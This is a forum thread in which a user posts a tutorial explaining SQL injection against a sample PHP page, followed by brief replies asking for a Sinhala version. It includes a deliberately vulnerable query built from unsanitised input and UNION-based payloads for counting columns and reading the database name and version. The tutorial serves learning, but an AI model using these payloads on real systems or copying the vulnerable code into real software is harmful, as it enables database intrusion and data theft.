Lanka Developers Community

    Lanka Developers

    • Register
    • Login
    • Search
    • Categories
    • Recent
    • Tags
    • Popular
    • Users
    • Groups
    • Shop

    SQL Injection Explained

    Information Security
    sql injection
    5
    8
    1233
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • Thilan Danushka
      Thilan Danushka last edited by

      Hello all,

      I hope you know how to do a SQL injection and have used it .In this tutorial we are going to see how it is working. What’s going on under the hood. How web application handle our input and process the SQL quarry. Let’s see.

      Imagine that there is a web application like this.
      Front-End Web Application

      Hear we see how web application takes input from the user and send that data to PHP script through a GET request.

      <html>
      <head>
      
      <title>SQL Injection Tutorial - HacksLand</title>
      </head>
      
      <body>
      
      <h1><center>HacksLand - Ethical Hacking Tutorials</center></h1>
      <form method = "GET" action="index.php">
      	<h2><center>Give the ID for fetch details</center></h2><br>
      	<input align="center" type="text" name="id">
      
      </form>
      
      </body>
      </html>
      

      Back-end PHP Script

      Now there should be a back-end script that handle this submitted data and make a SQL quarry.

      After SQL quarry return some data from database PHP script processes that data and give user output.

      Assume that following is the PHP code .

      <?php
      include("sql_connect.php");
      if(isset($_GET['id']))
      {
        $id=$_GET['id'];
        $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
        $result=mysqli_query($con, $sql);
        $row = mysqli_fetch_array($result, MYSQLI_BOTH);
      
        if($row)
        {
         echo 'Name for ID: '. $row['name'];
         echo "<br>";
         echo 'Age for ID: ' .$row['age'];
        }
        else
        {
         print_r(mysqli_error($con));
        }
      }
      else { echo "Please input the ID";}
      ?>
      

      I hope you can understand what is going hear.

      For this example we need a table that used by SQL quarry to take data from.

      0_1558268758468_table.png
      So all OK and fine.
      SQL Quarry

      Now let’s see how this is happening.

      Imagine that I enter 3 as the input. So our ID will be equal to 3. What about our SQL quarry?

      $sql="SELECT * FROM users WHERE id='3' LIMIT 0,1";
      

      So it will give us the output.

      Name for ID: Clara
      Age for ID : 18

      Nice!. It’s look like web application is working fine.

      Do you remember in our previous tutorial we used a single quote to break a SQL quarry?

      what if I enter 3′ as the input?

      It give me an error.

      You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3'' LIMIT 0,1′ at line 1
      

      What the fuck goes hear?

      $sql="SELECT * FROM users WHERE id='3'' LIMIT 0,1";
      

      You can clearly see that there is a syntax error near ID=’3” . Previously I explained why this happening.
      Injecting SQL Quarry

      Now we have to see how we can fix this error and extract data from the database. What if I enter flowing payload?.

      3′ –+

      Now our quarry is.

      $sql="SELECT * FROM users WHERE id='3' --+' LIMIT 0,1";
      

      But actually we only care the code before –+ Because it’s a comment character in SQL and everything after that will be ignored. So now this cod is valid and it’ll give us the output as expected.

      This is the time to fetch data from database.But how?

      Can we use another SELECT command with this one?

      Yes indeed. we can use two SELECT commands with UNION operator like this.

      SELECT Name,Age FROM users UNION SELECT Subject,ID FROM users
      

      But one thing. Both of SELECT quarries must use slimier number of columns to fetch data. It’s no matter that they use different columns , only amount of used columns should be same.

      You may say that it’s simple there are 5 columns in table. No buddy in real life you can’t see the table and you can’t figure out how many columns are there. 🙁

      We can you a trick for finding the number of columns used by first SELECT command.

      Think about our table and following commands.

      SELECT * FROM users  ORDER BY Name
      SELECT * FROM users  ORDER BY 3
      

      first command says select all columns from the users table and the order of results should be accordion to Name column. Second command also says that but results should be order with 3rd column(Age).

      So even we don’t know column names we can order by 1,2,3 etc OK.

      Now I enter this as the ID .

      3′ order by 1–+

      Let’s see our quarry.

      $sql="SELECT * FROM users WHERE id= '3' order by 1--+' LIMIT 0,1";
      

      This gives us output as expected because there are more columns than 1 . So it’s possible to order result accordion to the first column.

      Next we try order by 2. This also will be fine. Web application will work normally until we say order by 5.

      What if we enter order by 6 ?

      Surely it’ll give an error because there are no 6 columns. So by using this method we can find how many columns are using the first SELECT command. Now we can use another SELECT command

      SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1
      

      What going on hear is SQL quarry think that there is another table like following and quarry try to fetch data from both of them. After those data will be print to screen by PHP code.

      Now if we can print data from second table we can find which columns are using by web application to show data.(In this example we know that PHP script get Name and Age columns). But unfortunately we still we can see only flowing output. 🙁

      Name for ID: Clara
      Age for ID : 18

      why that? Because while our SQL quarry see there are two tables it first try to fetch data from first table. So if we want to get data from second one we must set a null value to first SELECT command . Our final payload .

      SELECT * FROM users WHERE id= '-3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1
      

      Since -3 is not in ID column data from our second table will be printed out.

      Name for ID: 2
      Age for ID : 3

      Finlay it’s success. We can see column 2 and 3 is used by web app.

      Now we can use these 2 channels for get any data from database. 🙂
      Extracting Basic information

      First of all let’s give a try to find out database name.

      SELECT * FROM users WHERE id= '-3' UNION SELECT 1,database(),3,4,5 --+ ' LIMIT 0,1
      

      we can see the database name in the screen.

      Name for ID: database_name
      Age for ID : 3

      SELECT * FROM users WHERE id= '-3' UNION SELECT 1,version(),3,4,5 --+ ' LIMIT 0,1
      

      Like this you can use

      database() , user() , version() etc to fetch some basic data.

      In next tutorial we are going to learn how to use SQL injection to extract more data.

      1 Reply Last reply Reply Quote 2
      • Sahan Pasindu Nirmal
        Sahan Pasindu Nirmal Web Development last edited by

        සිංහලෙන් දාන්න පුලුවන්නම් වටිනවා. lanka developers ලා නිසා. :)

        Nubelle 1 Reply Last reply Reply Quote 0
        • Thilan Danushka
          Thilan Danushka last edited by

          anik treads okkoma English ne bn. ekayi mehema damme :-)

          1 Reply Last reply Reply Quote 0
          • root
            root Linux Help last edited by

            ela bro. meka translation ekak danna sinhalen.

            1 Reply Last reply Reply Quote 0
            • Nubelle
              Nubelle Web Development @Sahan Pasindu Nirmal last edited by

              @Sahan-Pasindu-Nirmal elz

              1 Reply Last reply Reply Quote 0
              • Nubelle
                Nubelle Web Development last edited by

                elz bro patta @Thilan-Danushka

                1 Reply Last reply Reply Quote 0
                • Thilan Danushka
                  Thilan Danushka last edited by

                  thank you guys. I'll post more.

                  1 Reply Last reply Reply Quote 0
                  • dev_lak
                    dev_lak last edited by

                    Patta bro

                    1 Reply Last reply Reply Quote 0
                    • 1 / 1
                    • First post
                      Last post

                    0
                    Online

                    3.6k
                    Users

                    1.3k
                    Topics

                    5.3k
                    Posts

                    • Privacy
                    • Terms & Conditions
                    • Donate

                    © Copyrights and All right reserved Lanka Developers Community

                    Powered by Axis Technologies (PVT) Ltd

                    Made with in Sri Lanka

                    | |